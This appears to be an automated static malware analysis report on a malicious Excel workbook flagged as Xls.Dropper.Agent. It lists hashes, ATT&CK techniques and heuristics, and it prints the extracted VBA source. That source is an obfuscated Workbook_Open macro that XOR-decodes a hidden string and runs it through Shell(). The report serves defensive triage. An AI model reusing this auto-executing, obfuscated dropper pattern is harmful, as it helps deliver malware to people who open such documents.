Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2b12263def10a536…

MALICIOUS

Office (OOXML)

Size: 153.1 KB
Created: 2020-03-13 07:29:42 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2020-07-24
MD5: 85020b784ec6a9178b2a6225bf560fcb
SHA-1: c0b0a4c20c7f7fb583fc264e7a20ade1c456f901
SHA-256: 2b12263def10a536452804ecc8c987749009a9ba09cd48477907842e5b3626da
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro. This macro uses the Shell() function to execute a command, which is a common technique for downloading and executing a second-stage payload. ClamAV detection further confirms its malicious nature, identifying it as Xls.Dropper.Agent-7618562-0. The obfuscated VBA code suggests an attempt to evade detection.

Heuristics (6)

  • ClamAV: Xls.Dropper.Agent-7618562-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-7618562-0
  • VBA project inside OOXML [medium, 3 related findings] (OOXML_VBA)
    Document contains a VBA project (VBA macros present)
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Workbook_Open macro [high] (OLE_VBA_WBOPEN)
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3128 bytes
SHA-256: 594fadb5cfc3837ecbe3043ace70e6d2d18e271ba426229fead2fbc7ee05dbe3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
Dim ¥³±°§™Õ¹ä±­•œ•à±îyȧ·î½™§¹ì•yŧ¾½¥œÕ¾é¾à¹†Å±™îÌ•Z¥œ¹½˜ As String
Dim …Y³Ã¼•¬¹§B•¾˜o¾i±Â™½G¾N™ìº¾•·ÂøD×Y¶éà–yŬ™±¹½¾…´N¤…ñyŸä As String
Dim ¹¤Ÿ•Z†à–‚™â™y¾œÃ½à·‘½¨DD¹•™•×¹G•¾ÌÕ¾´YŸ¥•³yŸm±Èä¶½…§Z¹œ As String
Dim à§•ö½‚y½™´OÌî§§…·Ç·‚½ª•»¥È±•€••§•XÕ´D…™†±O™½Ÿ…ºD¾ÌZ»¨…• As String
Dim cc As String
Dim ±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•ǧîñ³°•à†ìØŸ•¶ÇÌ As String
±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•ǧîñ³°•à†ìØŸ•¶ÇÌ = (±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•ǧîñ³°•à†ìØŸ•¶ÇÌ + (Replace(a(a("g", "262626" + …Y³Ã¼•¬¹§B•¾˜o¾i±Â™½G¾N™ìº¾•·ÂøD×Y¶éà–yŬ™±¹½¾…´N¤…ñyŸä), "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"), " FFGGFFGG " + cc, "")))
Shell (±˜à±ä…œ¾AŸ½D³ºÌŒñ‘´­†•¹¾î´–ZàÕìØo·ÌÌŒ•ǧîñ³°•à†ìØŸ•¶ÇÌ)
End Sub
    Public Function a(CodeKey As String, DataIn As String) As String
        Dim lonDataPtr As Long
        Dim strDataOut As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(DataIn) / 2)
            intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
            strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        a = strDataOut
    End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 15872 bytes
SHA-256: 43fd9317e5c1b0cb7213246f49914b9f08f2e43ff78615a9712d5869e2f5000f
Detection
ClamAV: Xls.Dropper.Agent-7618562-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).